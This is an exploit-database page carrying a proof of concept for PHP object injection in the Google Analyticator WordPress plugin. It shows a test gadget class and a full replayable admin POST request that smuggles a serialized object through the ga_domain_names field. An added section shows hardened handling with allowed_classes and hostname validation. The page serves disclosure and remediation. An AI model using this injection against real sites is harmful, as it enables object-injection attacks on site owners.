## https://sploitus.com/exploit?id=WPEX-ID:DF1C36BB-9861-4272-89C9-AE76E62F687C
To simulate a gadget chain, put the following code in the plugin:

```php
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}
```

Then, as an admin, go to the plugin settings page (`/wp-admin/admin.php?page=google-analyticator`), save the settings and intercept the resulting request, add `ga_domain_names=O:4:"Evil":0:{};` to it, and replay it:

```http
POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1

_wpnonce=<nonce-key>&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};
```


The response will contain the "Arbitrary deserialization" output.
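
For anyone fixing or reviewing this class of bug, the following added example (not the plugin's code and not part of the original advisory) contrasts the unsafe pattern with two hardened ways of handling the same value. It assumes the parameter value reaches `unserialize()` unchanged and that the setting is meant to hold a comma-separated list of host names; `parse_domain_names()` and the `$woke` flag are hypothetical names.

```php
<?php
// Stand-in for the page's Evil class: records the magic-method call
// instead of die(), so the three handling paths can be compared in one run.
class Evil {
    public static bool $woke = false;
    public function __wakeup(): void {
        self::$woke = true;
    }
}

// Value of ga_domain_names from the replayed request on the page.
$ga_domain_names = 'O:4:"Evil":0:{};';

// 1. Unsafe pattern (assumed): the request value goes to unserialize() as-is.
//    PHP instantiates Evil and runs __wakeup(). PHP 8.3+ also warns about the
//    trailing ';', which is why the call is silenced with @.
$obj = @unserialize($ga_domain_names);
printf("default:         class=%s wakeup=%s\n",
    get_class($obj), var_export(Evil::$woke, true));

// 2. Hardened: refuse to instantiate any class. The object comes back as
//    __PHP_Incomplete_Class and none of Evil's methods are invoked.
Evil::$woke = false;
$obj = @unserialize($ga_domain_names, ['allowed_classes' => false]);
printf("allowed_classes: class=%s wakeup=%s\n",
    get_class($obj), var_export(Evil::$woke, true));

// 3. Preferred: never deserialize the field. Treat it as plain text and keep
//    only entries that look like host names (assumed format of the setting).
function parse_domain_names(string $raw): array {
    $hostname = '/^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/';
    $out = [];
    foreach (explode(',', $raw) as $item) {
        $item = strtolower(trim($item));
        if ($item !== '' && preg_match($hostname, $item) === 1) {
            $out[] = $item;
        }
    }
    return $out;
}

Evil::$woke = false;
var_dump(parse_domain_names($ga_domain_names));            // payload rejected
var_dump(parse_domain_names('example.com, Shop.Example.org')); // constructed input
var_dump(Evil::$woke);
```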